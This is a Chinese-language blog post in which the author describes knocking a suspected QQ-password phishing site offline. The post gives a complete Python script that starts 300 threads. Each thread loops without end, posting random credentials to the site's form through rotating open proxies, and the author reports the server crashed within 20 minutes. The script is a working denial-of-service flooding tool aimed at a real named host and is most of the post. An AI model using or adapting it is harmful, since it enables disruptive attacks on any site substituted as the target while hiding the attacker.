练习一下多线程——爬蹦一个骗子网站

筅森魡賤 提交于 2020-01-06 23:11:02

网址:

  • http://kfg04d.xyz/dfjh$9/

  • 这个网址现在应该是不能访问的,因为被我请求崩溃了。如果恢复了,那就。。。

  • 咳咳,回归正题,事情是这样的,群里面发了一个共享文档,打开时是这样的
    image.png

  • 这个链接进去是这样的
    image.png

  • 不管是网址还是结构都明显是骗子网站~
    image.png

  • 那就来个多线程爬虫搞他

分析:

  • 由于忘了截network的图了,他是个post请求,提交个表单
    image.png
  • 那么我就猜想,这个请求是用于收集QQ账号密码,用于盗取那啥,于是果断练习一波多线程爬虫爬取技巧

思路

  • 构造随机字符串数据
  • 分析真实URL,请求形式
  • 多线程开工

上代码

import threading
import time
import requests
import string
import random

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
}
url = "http://kfg04d.xyz/dfjh$9/4.asp?sn_sid="
params = {
    'qq': 'xxx@163.com',
    'mima': '********',
}
proxy_list = [
    '202.112.51.45:3128',
    '121.237.148.201:3000',
    '1.197.11.250:9999',
]

def sendqq(proxy):
    i = 0
    while 1:
        try:
            if i>50:
                i=0
                print("50")
            else:
                print(i)
                i+=1
            ran_qq = ''.join(random.sample(string.ascii_letters + string.digits, 8))
            ran_mima = ''.join(random.sample(string.ascii_letters + string.digits, 8))
            print("QQ={}\nMIMA={}".format(ran_qq, ran_mima))
            params["qq"] = ran_qq
            params["mima"] = ran_mima
            rep = requests.post(url=url, headers=headers, params=params,timeout = 1,proxies = proxy)
            print(rep)
            # time.sleep(1)
        except:
            pass


def multi_thread():
    # t1 = threading.Thread(target=sendqq)
    # t2 = threading.Thread(target=sendqq)
    # t1.start()
    # t2.start()
    t = []
    for i in range(300):
        proxy = {"http": random.choice(proxy_list)}
        t.append ( threading.Thread(target=sendqq,name="{}".format(i),args=(proxy,)))
        t[i].start()


if __name__ == '__main__':
    multi_thread()

  • 开了300线程,不出20分钟,它崩了
  • 具体是200 —> 500和200夹杂 ---->直接崩溃(用不同IP测试过,访问不了了)

结论

  • 这种网站连最基本的反爬都没有,十分的简陋,估计就是哪里抄的,不过还是希望上当的人越少越好
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!